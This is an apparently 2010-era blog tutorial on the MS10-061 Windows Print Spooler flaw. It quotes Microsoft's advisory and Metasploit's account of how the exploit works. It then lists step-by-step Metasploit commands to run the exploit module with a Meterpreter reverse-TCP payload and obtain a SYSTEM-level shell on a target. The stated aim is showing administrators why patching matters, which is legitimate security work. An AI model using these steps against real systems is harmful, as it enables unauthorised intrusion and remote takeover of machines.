Exploiting MS10-061 Print Spooler Service Vulnerability with Metasploit

By now you may or may not have heard from Microsoft about the MS10-061 vulnerability that was announced earlier this week. It's a vulnerability in the Print Spooler service that could allow Remote Code Execution on XP, 2003, Vista, 2008, 7, and 2008 R2. It's marked by Microsoft as critical, and they advise you patch straight away.

This security update resolves a publicly disclosed vulnerability in the Print Spooler service. The vulnerability could allow remote code execution if an attacker sends a specially crafted print request to a vulnerable system that has a print spooler interface exposed over RPC. By default, printers are not shared on any currently supported Windows operating system.

This security update is rated Critical for all supported editions of Windows XP, and Important for all supported editions of Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerability by correcting the manner in which the Printer Spooler service validates user permissions. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Until a few days back, there were no exploits yet available for it - but Metasploit has just released one (wonderful work guys). I'm going to borrow a few images from the Metasploit blog for now, as I don't have time to whip up my own, but here's a tutorial on how to exploit it to prove to the IT guys that they need to roll out the patches and reboot those servers :) So credits to Metasploit.com for the images! They had this to say about the exploit:

In its most egregious form, this bug allowed a guest user with print access to write arbitrary content to arbitrary files with SYSTEM privileges. That's pretty bad. However, the problem is, what should one write to to achieve code execution?

There haven't been a great deal of these types of vulnerabilities in the past. There are some ActiveX bugs where you could write a file, but the methods used to exploit those don't fit this situation. Most of those were exploited in ways that required user interaction (ie, writing to the "Startup" directory). One even takes advantage of an IE specific feature (hcp:// URI handling). However, these methods either won't work or will take a undetermined amount of time to complete :-/

We discussed writing directly to the Tasks directory, but decided against it early on. The number of fields in the job file format, especially the job signature, scared us away.

After some brainstorming, crowd-sourcing, and intense discussion, HD came up with the a very interesting technique. He found that you could, thanks to a Windows-ism, connect to a local named pipe and send data. Most RPC calls require reading a policy handle and passing it in another call. However, after a bit of MSDN searching, HD found the NetrJobAdd RPC call. This call doesn't require a policy handle, only job parameters. A successful call to it schedules a command to be executed at a specified time. Turns out, the hardest part is picking the right time. Of course, we could brute force it, but... we don't have to! SMB, the protocol over which the printer is accessed, conveniently provides the "SystemTime" and "ServerTimeZone" during negotiation! Perfect!

1. Share the printer on the target system (or, for an audit, assume the target is shared - think AD server or print server...)
2. If you don't have an authorised account to access the system, you will need to ensure that "Simple File Sharing" is enabled. Just go to "File and Folder Options" in explorer, and enable it:
   
3. Fire up your copy of Metasploit, and type: use exploit/windows/smb/ms10_061_spoolss
4. Set yourself a payload of your choice - I used my personal favourite, Meterpreter: set payload windows/meterpreter/reverse_tcp
5. Type "show options" to see your available options, and "set" for each one. For example, to set the option "PNAME", you type "set PNAME SoxThePrinter". Fill in your target under RHOST, your own IP under LHOST, and any other options you like. It should look like this:
   
6. Now, type the magical word "exploit", and watch the following happen (sorry for the lack of consistency - I don't have an environment right here where I can exploit a print server, so I've borrowed Metasploit.com's image of success):
   
7. On the target, type "at" to see if your task is scheduled to run:
   
8. Once it hits that time, "bam", and the SERVICE privelege shell is yours! That's higher than administrator :)

And so concludes this tutorial. Hope you enjoyed it :) Stay patched!